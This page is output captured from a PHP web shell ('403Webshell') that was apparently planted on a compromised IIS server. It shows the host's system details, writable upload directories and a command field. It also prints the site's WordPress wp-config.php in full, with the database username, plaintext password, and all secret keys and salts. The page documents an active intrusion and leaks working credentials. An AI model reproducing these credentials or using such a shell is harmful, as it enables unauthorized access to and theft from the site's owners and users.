403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/engineering/iimec/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/engineering/iimec/wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information
 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'engineering_summerschool'); /*engineering_summerschool*/

/** MySQL database username */
define('DB_USER', 'summerscen'); /* summerscen*/

/** MySQL database password */
define('DB_PASSWORD', '#SummScEng2012!@'); /* #SummScEng2012!@*/

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '94VXBNt2EO)hWxb5#I+8|$kDzdV3KVWYEG$!IQaI>8+vTQ*q+uM4=tmy P.Gd9eT');
define('SECURE_AUTH_KEY',  'A*amQCQeT,!J!qxw[.>|D9]F~`.0yEgZ0 FO<6scnEHpId0nYgW+;.v1Em3f8RV(');
define('LOGGED_IN_KEY',    'IVRGZaBmZF2AtyBZ=}J>JM~~D$>/Y YP.s@syo|L/#4Zkoy@aj+^c^F!hMir@P?@');
define('NONCE_KEY',        'DfGdS Z_g?wR}0Y;/].=};@p`K(u2fs`Vf~!T4| qzhl,z%p&vfe.=mz;Y:*XFF|');
define('AUTH_SALT',        '|2KU4)HJpVQKU,y~i=(0ENOuR{g1k2Q F]j:#u@n+Lzh!J.MCdJ XP=Ok-3f-,5J');
define('SECURE_AUTH_SALT', 'hAV2}8 SP?4cKF7kkHVWh&WN3CTV TdN6]F;i6(=<46z8HK8DSZ&/9t|_S)|^HJ.');
define('LOGGED_IN_SALT',   'A/QM:C _8<rBh!s.|bm[9$83>U]utr$5H8:lcGfhTI$KB8-Fne|B(f0K6m>7yTJH');
define('NONCE_SALT',       '8kc2$6Y3%pX8thKg?;O9La71801/qGq~q_OrHHFS:.cLf$SXF}|Kd]o}M<p{#FdQ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'stegr_';

/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress. A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
 * language support.
 */
define('WPLANG', '');

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */

define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
//Disable File Edits
define('DISALLOW_FILE_EDIT', true);

Youez - 2016 - github.com/yon3zu
LinuXploit